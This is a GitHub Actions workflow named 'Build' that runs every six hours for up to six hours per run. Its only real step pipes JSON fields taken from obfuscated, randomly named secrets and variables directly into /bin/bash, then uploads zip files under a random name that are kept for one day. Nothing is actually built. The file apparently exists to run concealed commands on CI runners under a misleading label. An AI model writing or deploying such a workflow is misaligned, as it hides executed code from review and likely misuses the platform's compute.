name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '9 0,6,12,18 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          efay27420: ${{ secrets.efay27420 }}
        run: |
          printf '%s' "$efay27420" | jq -r .qx989 | /bin/bash
          echo $udfmi0 | jq -r .kno65777 | /bin/bash
          printf '%s' "$fcbe749" | jq -r .jarnz926 | /bin/bash

      - name: Archive results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: wObyBU5b
          path: "*.zip"
          retention-days: 1
